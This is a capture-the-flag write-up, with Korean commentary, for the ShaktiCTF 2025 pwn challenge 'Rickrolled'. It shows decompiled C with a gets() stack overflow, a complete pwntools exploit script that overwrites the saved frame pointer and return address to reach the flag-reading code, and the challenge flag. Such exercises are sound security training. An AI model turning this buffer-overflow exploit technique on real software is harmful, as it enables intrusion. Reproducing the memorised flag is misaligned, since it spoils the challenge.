Home
System Hacking
🛰️

[ShaktiCTF 2025][Pwn] Rickrolled

Type
CTF
년도
2025
Name
ShaktiCTF
분야
System
세부분야
BOF
2025/07/28 01:13
1 more property

# Description

Just a program that rickrolls whoever runs it. Author: omelette_keychain
Plain Text
복사

# 분석

Checksec

Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) SHSTK: Enabled IBT: Enabled Stripped: No
Plain Text
복사
핵심 부분만 보자 v0, v8, v7가 특정 값으로 변경되어야 실행된다.
__int64 v0; // r11 __int64 v1; // r13 __int64 v2; // r15 char s[48]; // [rsp+0h] [rbp-60h] BYREF char v5[16]; // [rsp+30h] [rbp-30h] BYREF FILE *stream; // [rsp+40h] [rbp-20h] __int64 v7; // [rsp+48h] [rbp-18h] __int64 v8; // [rsp+50h] [rbp-10h] __int64 v9; // [rsp+58h] [rbp-8h] if ( v0 == 0xBEEFDEADLL && v8 == 2880290543LL && v7 == 3735928493LL ) { stream = fopen("flag.txt", "r"); if ( !stream ) printf("Error in opening the flag file. Flag file might be missing."); fgets(s, 46, stream); puts("\nHere is your flag: \n"); puts(s); exit(0); } puts("Hello. What a plesant day! I am definitly not planning anything evil. :>"); puts("Do you have anything to say to me?"); gets(v5); puts("Your last words are: "); puts(v5); puts("Now prepare for the worst!");
C
복사
하지만 gets에서 StackOverFlow 취약점이 존재한다.
ret을 조작해서 원하는 부분을 실행할 수 있으며 보호기법은 NO PIE, No Canary 임으로 원하는 binary의 함수를 실행할 수 있다.
retsteam = fopen(”flag.txt”, “r”) 부분으로 조작하면 문제가 풀리며, 여기서 fopen의 결과인 steamrbp-0x20 임으로, sfpbss 영역으로 옮겨준다.

# Payload

#!/usr/bin/env python3.12 ''' author: JangJongMin time: 2025-07-28 10:19:04 ''' from pwn import * filename = "rickrolled_patched" libcname = "/home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1".strip() port = 1337 elf = context.binary = ELF(filename) context.terminal = ['tmux', 'neww'] if libcname: libc = ELF(libcname) gs = ''' set debug-file-directory /home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 set $pie_base=$_base("rickrolled_patched") b *0x4014b6 c ''' def start(): if args.GDB: return gdb.debug(elf.path, gdbscript = gs) elif args.REMOTE: return remote(host, port) else: return process(elf.path) def log(str_, hex_): success(f"{str_} : {hex(hex_)}") def DEPTR(ptr): _12bits = [] dec = 0 while ptr != 0: _12bits.append(ptr & 0xfff) ptr = ptr >> 12 x = _12bits.pop() while len(_12bits) > 0: dec |= x dec <<= 12 y = _12bits.pop() x = x ^ y dec |= x return dec def ENPTR(pos, ptr): return (pos >> 12) ^ (ptr) p = start() s = p.send sf = p.sendafter sl = p.sendline slf = p.sendlineafter r = p.recv ru = p.recvuntil rl = p.recvline payload = b"A"*0x30 payload += p64(elf.bss() + 0x100) + p64(0x40125A) slf("me?", payload) p.interactive()
Python
복사

# Flag

shakticon25{r0p_cH@!n_n3v3r_gOnna_let_u_dowN}
Plain Text
복사